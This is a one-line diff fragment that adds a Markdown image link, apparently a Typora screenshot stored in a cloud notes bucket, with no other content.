+![image-20220525153105283](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251531338.png) \ No newline at end of file